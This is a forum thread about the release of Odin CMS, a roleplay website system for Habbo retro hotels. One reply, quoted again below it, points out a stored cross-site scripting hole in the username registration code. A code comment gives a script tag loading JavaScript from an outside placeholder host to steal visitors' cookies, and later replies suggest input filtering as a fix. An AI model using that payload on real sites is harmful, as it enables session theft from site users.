[REL] Odin CMS - Pure Roleplay CMS

Don't use it anymore.

Dev thread: https://forum.ragezone.com/f331/odin...l-oop-1063274/
Download: https://mega.nz/#!DxJhnQRJ!5QpRnQqxt...G-B3iaLdyswSqU

Love it, thanks Jonty!

- Gan

I am Spanish, but honestly I loved this cms, I want to know what the db of the cms and uses tables I would like you to answer me.

Quote:

---

Originally Posted by Jonteh

Don't use it anymore.

Dev thread: https://forum.ragezone.com/f331/odin...l-oop-1063274/
Download: https://mega.nz/#!DxJhnQRJ!5QpRnQqxt...G-B3iaLdyswSqU

---

mybee you can share database to ?

Quote:

---

Originally Posted by TheRenchix

mybee you can share database to ?

---

This CMS was coded to work with the emulator that Amp RP: Login uses, its a bfly emulator turned into rp emulator from 0 by jonty and i highly doubt he will release the emulator. If you want to use the cms you will have to make it work with your own rp emulator and db, and nice release Jonty this is a clean and good cms.

I bet there are exploits lol

Quote:

---

Originally Posted by Matthew-the-man

I bet there are exploits lol

---

noobs will be noobs - aka you

ahh you released it, awesome release man. :8:

I've looked at the source, looks like you have quite a lot of XSS vulnerabilities

you can also pick a username with the skull altcode, so nobody can ban or target you whatsoever

Code:

---

$first_name = (isset($_POST["username"]) ? $core->Filter($_POST["username"]) : null);
//here it just filters the username, so blabla"blabla will become blabla\"blabla, nothing wrong with that, but you can still pick this name

if(is_null($first_name))
{
    $registerErrors[] = "You must enter a username.";
}
//just checks if it's null, nothing wrong with it

$full_name = $first_name;

if(!$users->CheckUsername($full_name))
{
    $registerErrors[] = "That username is unavailable.";
}
//Here it checks if there's the same username already, there's no check what characters you can use whatsoever
//you can just fill in <script src="http://whateverwebsite.com/blabla.js"></script> and steal some cookies!

---

If I'm wrong, just tell me, but it looks like there's a lot of XSS exploits one can use, this is just one example.

Quote:

---

Originally Posted by MovieGuy

I've looked at the source, looks like you have quite a lot of XSS vulnerabilities

you can also pick a username with the skull altcode, so nobody can ban or target you whatsoever

Code:

---

$first_name = (isset($_POST["username"]) ? $core->Filter($_POST["username"]) : null);
//here it just filters the username, so blabla"blabla will become blabla\"blabla, nothing wrong with that, but you can still pick this name

if(is_null($first_name))
{
    $registerErrors[] = "You must enter a username.";
}
//just checks if it's null, nothing wrong with it

$full_name = $first_name;

if(!$users->CheckUsername($full_name))
{
    $registerErrors[] = "That username is unavailable.";
}
//Here it checks if there's the same username already, there's no check what characters you can use whatsoever
//you can just fill in <script src="http://whateverwebsite.com/blabla.js"></script> and steal some cookies!

---

If I'm wrong, just tell me, but it looks like there's a lot of XSS exploits one can use, this is just one example.

---

you're correct, you can use special characters to create usernames already taken, this CMS is used on iHabiHotel and i patched the issues on his live copy of the CMS

After actually looking at this copy, ive discovered it's NOT the roleplay version i thought it was, this is an edit of odin cms for ihabi.net with issues patched on their live copy

should read the guys post above mine, completely forgot about it. you should be checking for ctype_alnum if you know how. also you could strip tags, str_replace, or use regex to remove anything you dont want in the username. this is something i always overlook when coding a new cms

- - - Updated - - -

Quote:

---

Originally Posted by Robot

ahh you released it, awesome release man. :8:

---

all good dude but please pay attention to my last post and also the post i quoted, this is not a finished product

It is still based on a RP database, but it's easy to change and make it work as for any other emulator, you can finish it yourself too. The hard parts are already finished, and i really like this cms, i already fixed that XSS exploits too which is pretty much the only thing that was wrong with it, and @Matthew-the-man "i bet there are exploits" i highly doubt you even know what a exploit is m8, don't let your mind go with what other people say about jonty, you shouldn't even try to trash talk a work of someone that is highly more advanced in coding than you are (if you even code of course)

I've changed the theme of the CMS and fixed nearly anything that was wrong with it. I've also recreated a few new addons for it. It is very malleable and I love it. I will post screenshots when I've got a finished product.

I found it funny how people take credits for the css and design etc. When I was the one who originally coded this

Quote:

---

Originally Posted by Leon Retros

I found it funny how people take credits for the css and design etc. When I was the one who originally coded this

---

theres credits to you in my dev thread i think mate, ive always maintained that i did not design or code any of the css

Quote:

---

Originally Posted by Jonteh

noobs will be noobs - aka you

---

You're similar to Rand Paul. Most of the time, I can't agree with you, but every now and then, I'll find myself cheering for you.